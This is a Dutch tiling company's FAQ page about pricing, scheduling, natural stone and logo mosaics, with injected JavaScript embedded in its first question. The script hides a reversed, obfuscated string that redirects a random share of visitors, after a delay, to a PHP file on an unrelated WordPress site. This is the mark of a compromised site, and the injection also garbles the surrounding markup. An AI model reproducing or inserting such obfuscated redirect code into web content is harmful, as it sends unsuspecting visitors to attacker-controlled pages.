FAQ’s

Krijgertegelwerken

”Wat

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toilet of badkamer door Krijgertegelwerken?” is_open=”yes”]De kosten van het tegelwerk is afhankelijk van meerdere factoren. Uiteraard bepaalt de afmeting van de ruimte in eerste plaats de prijs. Maar ook het type tegel en eventuele voorbereidende werkzaamheden zijn aspecten die meespelen. Daarom adviseren wij u om een afspraak te maken met een tegeladviseur van 1 van onze leveranciers. Uiteraard is het mogelijk om eigen leverancier te zoeken en met de verkregen informatie en tekening offerte voor het plaatsen bij Krijgertegelewerken op te vragen.
Na uw gesprek met ons ontvangt u een vrijblijvende prijsopgave waarin alle kosten duidelijk zijn omschreven. Zo weet u precies waar u met Krijgertegelwerken aan toe bent.

Plaatst Krijgertegelewerken ook tegels bij particulieren en bedrijven?

Bij Krijgertegelwerken kunt u als particuliere en als zakelijke klant terecht voor alle soorten tegels in elke maat en prijsklasse.

Kan ik alvast een impressie krijgen van het tegelwerk?

Op de website onder foto’s kunt u een goede impressie krijgen van ons tegelwerk. Waar nodig is het mogelijk om reeds geplaatst tegelwerk te bezichtigen.

Hoe snel kan Krijgertegelewerken bij u terecht?

Afhankelijk van de drukte kan dit variëren van 1 week tot 4 weken. Waar nodig proberen wij u te helpen om tegelwerken naar voor te plaatsen indien de noodzaak er voor is. Uiteraard is het voor ons maar zeker voor u dat gemaakte afspraken en tijden gehanteerd blijven voor een juist en correct verloop van uw project.

Plaatst Krijgertegelwerken ook natuursteen?

Ja, bij Krijgertegelwerken kunt u ook terecht voor natuursteen. Wij hebben jarenlange ervaring in het plaatsen van natuurstenen vloeren. Wel attenderen wij u erop dat natuursteen een natuurproduct is. Daarom zal het aan u geleverde natuursteen nooit dezelfde tekening hebben als het exemplaar in de showroom.

Kan Krijgertegelwerken mijn complete badkamer verbouwen?

Nee, Krijgertegelwerken is gespecialiseerd in tegelwerk. Voor een complete verbouwing werken wij collegiaal samen met enkele aannemers, loodgieters en elektriciens in de regio. Uiteraard helpen wij u hier mee verder en nemen we uw zorgen uit handen.

Ik wil mijn bedrijfslogo of mozaiek in mijn vloer verwerkt hebben. Kan dat?

Ja, Krijgertegelwerken denkt graag met u mee over het verwerken van uw bedrijfslogo in het tegelwerk. Hierbij kunt u denken aan uw vloer maar ook met tegelwerk op de muur kunt u spectaculaire effecten bereiken.